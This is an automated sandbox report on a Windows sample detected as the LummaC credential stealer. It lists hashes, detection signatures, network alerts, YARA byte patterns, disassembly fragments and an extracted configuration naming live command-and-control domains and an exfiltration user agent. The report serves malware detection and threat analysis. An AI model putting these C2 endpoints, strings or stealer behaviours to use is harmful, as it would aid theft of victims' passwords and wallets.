Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ljrprfl3BH.exe

Overview

General Information

Sample name:Ljrprfl3BH.exe
renamed because original name is a hash value
Original sample name:ab03119a9a5959898463ff872c49935d.exe
Analysis ID:1586500
MD5:ab03119a9a5959898463ff872c49935d
SHA1:c1abff218d0fbd0949441bee03257b042901de88
SHA256:70a579f24a9f7013d5de627125f829b2ebb137586d3f293ff608cec606655e8b
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ljrprfl3BH.exe (PID: 5920 cmdline: "C:\Users\user\Desktop\Ljrprfl3BH.exe" MD5: AB03119A9A5959898463FF872C49935D)
    • BF85.tmp.exe (PID: 2828 cmdline: "C:\Users\user\AppData\Local\Temp\BF85.tmp.exe" MD5: D66791DB5C8D7BF392361E2343F7A5EA)
      • WerFault.exe (PID: 3796 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1688 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["handscreamny.shop", "femalsabler.shop", "soundtappysk.shop", "versersleep.shop", "robinsharez.shop", "apporholis.shop", "chipdonkeruz.shop", "skidjazzyric.click", "crowdwarek.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000000.00000002.4666285688.0000000000708000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1750:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
      • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
      00000003.00000002.2393295937.0000000000540000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000003.00000002.2393532432.0000000000815000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Click to see the 2 entries
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:33:38.662091+010020283713Unknown Traffic192.168.2.649747104.21.64.1443TCP
        2025-01-09T08:33:39.613649+010020283713Unknown Traffic192.168.2.649753104.21.64.1443TCP
        2025-01-09T08:33:41.386982+010020283713Unknown Traffic192.168.2.649764104.21.64.1443TCP
        2025-01-09T08:33:42.559005+010020283713Unknown Traffic192.168.2.649771104.21.64.1443TCP
        2025-01-09T08:33:44.185867+010020283713Unknown Traffic192.168.2.649782104.21.64.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:33:39.124512+010020546531A Network Trojan was detected192.168.2.649747104.21.64.1443TCP
        2025-01-09T08:33:40.080394+010020546531A Network Trojan was detected192.168.2.649753104.21.64.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:33:39.124512+010020498361A Network Trojan was detected192.168.2.649747104.21.64.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:33:40.080394+010020498121A Network Trojan was detected192.168.2.649753104.21.64.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:33:41.948675+010020480941Malware Command and Control Activity Detected192.168.2.649764104.21.64.1443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-01-09T08:33:34.908696+010028032742Potentially Bad Traffic192.168.2.649715104.21.56.70443TCP
        2025-01-09T08:33:35.800260+010028032742Potentially Bad Traffic192.168.2.649726176.113.115.1980TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: Ljrprfl3BH.exeAvira: detected
        Source: https://skidjazzyric.click/Avira URL Cloud: Label: malware
        Source: soundtappysk.shopAvira URL Cloud: Label: malware
        Source: robinsharez.shopAvira URL Cloud: Label: malware
        Source: crowdwarek.shopAvira URL Cloud: Label: malware
        Source: versersleep.shopAvira URL Cloud: Label: malware
        Source: https://skidjazzyric.click/apiAvira URL Cloud: Label: malware
        Source: handscreamny.shopAvira URL Cloud: Label: malware
        Source: skidjazzyric.clickAvira URL Cloud: Label: malware
        Source: apporholis.shopAvira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/track_prt.php?sub=0&cc=DEAvira URL Cloud: Label: malware
        Source: chipdonkeruz.shopAvira URL Cloud: Label: malware
        Source: femalsabler.shopAvira URL Cloud: Label: malware
        Source: https://skidjazzyric.click:443/apiAvira URL Cloud: Label: malware
        Source: https://skidjazzyric.click/apiXxZ9NjAAA=Avira URL Cloud: Label: malware
        Source: https://post-to-me.com/Avira URL Cloud: Label: malware
        Source: https://skidjazzyric.click:443/api:Avira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1306978
        Source: 3.3.BF85.tmp.exe.2140000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["handscreamny.shop", "femalsabler.shop", "soundtappysk.shop", "versersleep.shop", "robinsharez.shop", "apporholis.shop", "chipdonkeruz.shop", "skidjazzyric.click", "crowdwarek.shop"], "Build id": "4h5VfH--"}
        Source: Ljrprfl3BH.exeVirustotal: Detection: 38%Perma Link
        Source: Ljrprfl3BH.exeReversingLabs: Detection: 50%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeJoe Sandbox ML: detected
        Source: Ljrprfl3BH.exeJoe Sandbox ML: detected
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: robinsharez.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: handscreamny.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: chipdonkeruz.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: versersleep.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: crowdwarek.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: apporholis.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: femalsabler.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: soundtappysk.shop
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: skidjazzyric.click
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000003.00000002.2393490313.0000000000750000.00000040.00001000.00020000.00000000.sdmpString decryptor: 4h5VfH--
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 3_2_00415720 CryptUnprotectData,3_2_00415720

        Compliance

        barindex
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeUnpacked PE file: 0.2.Ljrprfl3BH.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeUnpacked PE file: 3.2.BF85.tmp.exe.400000.0.unpack
        Source: Ljrprfl3BH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
        Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.6:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49771 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.6:49782 version: TLS 1.2
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
        Source: C:\Users\user\Desktop\Ljrprfl3BH.exeCode function: 0_2_021C8C49 FindFirstFileExW,0_2_021C8C49
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0043B870
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov esi, ecx3_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00415720
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00419840
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0040A05C
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00427070
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042D830
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0043F0E0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B882
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then jmp eax3_2_004418A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B173
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B170
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041A900
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041B184
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then test esi, esi3_2_0043C9A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041B243
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EA62
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00402210
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0040AA32
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]3_2_00425AF0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00428280
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0041F2A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebx, eax3_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebp, eax3_2_00405AB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0040B2B0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EB5F
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042BB00
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041BB21
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441B20
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041AB2A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0040C334
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]3_2_0040C3EC
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ebx, edx3_2_0042DBF0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then jmp ecx3_2_0040D334
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00422380
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0041BBA0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_0042BBA0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBA1
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00440BAB
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_0042EBB3
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441BB0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_00441C40
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00442470
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00426C76
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov eax, edi3_2_0041C400
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00417405
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_00414C20
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_0044042D
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_0044042D
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B484
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_00427490
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00425D6A
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00438520
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_00442D20
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then push edi3_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0043C5A0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0042B652
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0041B667
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00418672
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00409E09
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00407620
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then jmp ecx3_2_0040CEC7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00416ED0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0041BEE1
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041AEFF
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0040DFE2
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_00408F90
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_004427B0
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0075A070
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov esi, ecx3_2_007660EF
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0076B166
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]3_2_0076C148
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]3_2_00767137
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then jmp ecx3_2_0075D12E
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]3_2_007591F7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h3_2_007921EA
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]3_2_0075E249
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_0075E249
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]3_2_0075A2C3
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h3_2_0078F347
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0076B3EB
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0076B3DA
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]3_2_00752477
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_007784E7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0076B4AA
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]3_2_0076F507
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_007725E7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]3_2_0075C59B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov eax, edi3_2_0076C667
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then jmp ecx3_2_0075D59B
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov word ptr [esi], cx3_2_007776F7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0076B6EB
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_007926D7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h3_2_00790694
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, eax3_2_00790694
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [esi], al3_2_0076773F
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00788787
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then push edi3_2_0078C807
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]3_2_0078C807
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]3_2_00768809
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_007658FA
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h3_2_0077B8B5
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_00757887
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_00757887
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov ecx, edx3_2_0075BA6C
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh3_2_00792A17
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]3_2_00767AE4
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov edx, ecx3_2_00767AE4
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0076BAE9
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx3_2_0078BAD7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov edx, ecx3_2_0078BAD7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h3_2_00769AA7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0077DA97
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0076AB67
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h3_2_00776BA7
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then jmp eax3_2_00791C3E
        Source: C:\Users\user\AppData\Local\Temp\BF85.tmp.exeCode function: 4x nop then test esi, esi3_2_0078CC07
